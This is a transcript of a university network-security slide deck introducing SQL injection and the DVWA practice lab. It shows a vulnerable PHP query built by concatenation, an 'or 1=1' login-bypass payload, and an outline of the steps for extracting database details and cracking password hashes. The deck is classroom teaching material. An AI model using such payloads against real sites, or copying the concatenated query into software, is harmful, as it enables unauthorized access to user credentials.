Sql Injection at Hashemite University
-
Upload
yusuf-amro -
Category
Technology
-
view
147 -
download
1
Transcript of Sql Injection at Hashemite University
![Page 1: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/1.jpg)
The Hashemite University Prince Al-Hussein Bin Abdullah II Faculty for Information
Technology
Sql Injection with Yusuf Ali
Network SecurityBy
Dr. Ashraf Aljammal
![Page 2: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/2.jpg)
What we will learn ?
4 ) How to use dvwa to develop our skills ?3 ) What is dvwa project.
2) How to attack using SQL injection ?1 ) What is SQL Injection .
![Page 3: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/3.jpg)
Sql Injection
![Page 4: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/4.jpg)
How to hack a website using Sql injection?
![Page 5: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/5.jpg)
The Vulnerable is execution of inputs without scan it.Inputs like username maybe a sql statement! Which executed at Database of server by Hackers.
1 )Normal password : karcobia$sql = “select * from users where
pass=$password;”2 )Attacker's password : abc. or 1=1
$sql = “select * from users where pass=$password”.or 1=1;
![Page 6: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/6.jpg)
As we can see here we got all users and passwords in the Database!
![Page 7: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/7.jpg)
Hacker can execute any sql statement like Admin privileges !
Result
![Page 8: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/8.jpg)
dvwa Project :// . . .http www dvwa co uk/
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, It also helps web developers better understand the process of securing server and web app or can also be use to teach students ethical hacking and pretesting.
- See more at: http://www.hackw0rm.net/2013/02/how-to-create-penentration-lab-in.html#sthash.AXAhpGPY.dpuf
![Page 9: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/9.jpg)
Let’s Try it!
![Page 10: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/10.jpg)
SQL Injection
Gather information of database : 1 ) Version of Database
2 ) User of Database3 ) Database name
4 ) Tables in Schema information5 ) mysql Table information
6 ) Users and Passwords7 ) Decrypt Hash Passwords
![Page 11: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/11.jpg)
How to ensure that your password hash in not in the MD5 huge
databases ?
![Page 12: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/12.jpg)
What we learned ?
What is Sql Injection.How to attack using sql injection?
What is dvwa project.How to use dvwa to develop your skills?
![Page 13: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/13.jpg)
![Page 14: Sql Injection at Hashemite University](https://reader036.fdocuments.in/reader036/viewer/2022081506/55b38ed7bb61ebfa1b8b4683/html5/thumbnails/14.jpg)
Thank you for your time and attention!
Contact info:Email: [email protected]
Twitter: @YusufAmroJunior GIS Web and Mobile Application Developer
JoGulf Spatial Data Systems